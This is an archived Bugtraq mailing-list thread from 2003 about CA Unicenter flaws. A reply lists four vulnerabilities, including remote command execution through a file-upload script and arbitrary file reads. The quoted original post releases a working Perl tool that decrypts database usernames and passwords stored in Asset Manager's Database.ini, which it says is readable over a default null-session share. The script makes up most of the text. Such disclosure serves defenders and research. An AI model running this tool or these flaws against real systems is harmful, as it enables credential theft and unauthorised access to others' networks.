Bugtraq mailing list archives
Re: CA Unicenter Password Recovery Tool
From: Joao Gouveia <tharbad () kaotik org>
Date: 04 Jun 2003 19:21:37 +0100
Hello Tor, all

While you're at it, you might want to take a look at this. I've come across these vulnerabilities while doing a superficial review on CA's TNG Unicenter. Not sure if some of this may affect "Asset Manager" or not.

<quote>
#1. Remote command execution via file upload ( http://machine/scripts/file_upload.pl )

#2. A helpdesk user with no special access rights can read any file on the system where the Service desk daemon has access ( by default Local/SYSTEM ). The pdmcgi.exe accepts "templates" as a parameter without further security check regarding what type of files can be used as "templates".

#3. pdm_cgireport.exe allows to create and browse any report without prior authentication.

#4. Normal user, who is configured to see only his requests, is able to see all requests by manipulating pdmcgi.exe queries.
</quote>

AFAIK, all these issues have been fixed, but I have no clue if the fixes are public or not. You should contact CA if you feel you might be vulnerable.

Best regards,
Joao Gouveia
------------
tharbad () kaotik org

On Wed, 2003-06-04 at 16:27, Tor Houghton wrote:
List,

The following can also be found at:

http://www.kufumo.com/releases/ca-passwordrecover.txt

Thanks,
Tor Houghton

; $Id: ca-passwordrecover.txt,v 1.3 2003/05/20 10:46:51 torh Exp $

Computer Associates "Asset Manager" Password Recovery Tool
(c) 2003 Tor Houghton (th at kufumo dot com)

++Synopsis++

The Computer Associates' Unicenter Asset Manager(TM) software uses a stored secret in order to decrypt stored passwords. Attached to this text is a tool to decrypt these passwords.

++What++

(http://www3.ca.com/Solutions/Collateral.asp?CID=33237&ID=194)

Simply put, it is a data collector with extended privileges. It is comprised of an "Engine" (and a database), one or more "Sectors", a "Console" and an "Agent" for each device (Windows or UNIX) that is to be added to the asset database (see fig 1).

    [Console]              +-------- [Agent]
        |                  |
        v                  v
  [Database] <-- [Engine] --> [Sector] <-- [Agent]
                    |
                    +-------> [Sector] <-- [Agent]
                                  ^
                                  |
                                  +-------- [Agent]

                        (figure 1)

The arrows do not depict data flow, but transaction flow. For example, the Agents do get data from the Sector (and deliver data to it), but the Agent initiates this transaction. The Engine issues jobs and collects results (both stored on the Sector) and the Agent executes these.

On the whole, this looks like a nice design; you could easily firewall the Engine, Console and Database from the rest of the network, for example. However, the Sector is (by default) a NULLSESSION share, writable by anyone.

Anyway. This document is not about whether or not it is possible to compromise any machine with an Agent on it through a Sector, but to release a password recovery tool. Here it is.

--
#!/usr/bin/perl
$version='ca-dbpwrecover 1.2 2003/03/19';
##
## (c) th at kufumo.com 2003
##
## this version was based on AMO Unicenter 3.2
##
## thanks to emf at kufumo.com and ssw at kufumo.com for help with the
## disassembly and helping to reverse the encoding algorithm! go daddy!
##
## can't find a suitable file?
##
## (a default installation has the file 'Database.ini' available via a
## nullsession share ("amdomain$") on the machine running the console/
## engine.)
##
##
$|=1;
##
$ironic_seed="NetCon";   ## we predict $ironic_seed will change
                         ## in the next version of CA AMO etc.
$CRYPT="BP7xCtDQqA2EZWoFH6wSIJeMzdYLb9Vfm5uNO4cKRGT3kUX018apyghijlnrsv";
$CLEAR="ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz";

use Getopt::Long;
## "h" has no linkage, so Getopt::Long stores it in $opt_h
GetOptions("h", "u=s" => \$uname, "p=s" => \$pword, "f=s" => \$file);

if($opt_h) {
  print <<EOM;
$version (c) 2003 th at kufumo.com
usage: ca-dbpwrecover [-h] [-u <username>] [-p <passwd>] [-f <file>]
  -h : this
  -p : password (if not using files)
  -u : username (if not using files)
  -f : filename (e.g. 'ca-dbpwrecover -f Database.ini')
EOM
  exit(1);
}

if($file) {
  DecryptCAEncryption("","",$file);
} else {
  if($pword && $uname) {
    ## (the sub name was misspelled here in the original; fixed so the
    ## -u/-p path actually calls the routine below)
    DecryptCAEncryption($pword,$uname,"");
    exit(0);
  } else {
    print "Not enough parameters. Try -h.\n";
    exit(1);
  }
}
exit();

sub DecryptCAEncryption {
  my($pword,$uname,$file)=@_;
  my($u,$c,$oa,$ob,$offset);
  my(@crypt)=split(//,$CRYPT);

  if($file) {
    open(IN,$file) || die "error: failed to open $file: $!\n";
    while(<IN>) {
      if(/^UserName=\#(\S+)\s*$/) {$name=$1;}
      if(/^Password=\#(\S+)\s*$/) {$pass=$1;}
    }
    close(IN);
  }
  $uname=$name if($name);
  $pword=$pass if($pass);

  @pass=split(//,$pword);
  @user=split(//,$uname);
  @nc=split(//,$ironic_seed);

  print "Username: ";
  $c=5;
  for($u=0;$u<@user;$u++) {
    ## find occurrence of current char ($user[$u]) in cleartext
    ## keystring:
    $_=$CLEAR;
    while(m/$user[$u]/g) { $oa=pos; }
    $oa++;
    if($u<@nc) {
      ## first characters are keyed against the fixed seed
      $_=$CRYPT;
      while(m/$nc[$u]/g) { $ob=pos; }
      $ob++;
      $oa=$oa+($ob*-1);
    } else {
      $oa=$oa-$u+$c;
      $c++;
    }
    while($oa<0) { $oa=$oa+62; }
    while($oa>62) { $oa=$oa-62; }
    $oa--;
    push(@clear,$crypt[$oa-1-$u]);
  }
  foreach(@clear) { print $_; }
  print "\n";

  ## who said reuse of code is a good thing?
  ## i think i failed class here. heck, did you want the tool or not?
  ##
  print "Password: ";
  $c=@clear;
  for($u=0;$u<@pass;$u++) {
    ## find occurrence of current char ($pass[$u]) in cleartext
    ## keystring:
    $_=$CLEAR;
    while(m/$pass[$u]/g) { $oa=pos; }
    $oa++;
    if($u<@clear) {
      ## password characters are keyed against the recovered username
      $_=$CRYPT;
      while(m/$clear[$u]/g) { $ob=pos; }
      $ob++;
      $oa=$oa+($ob*-1);
    } else {
      $oa=$oa-$u+$c-1;
      $c++;
    }
    while($oa<0) { $oa=$oa+62; }
    while($oa>62) { $oa=$oa-62; }
    $oa--;
    push(@cpass,$crypt[$oa-1-$u]);
  }
  foreach(@cpass) { print $_; }
  print "\n";
}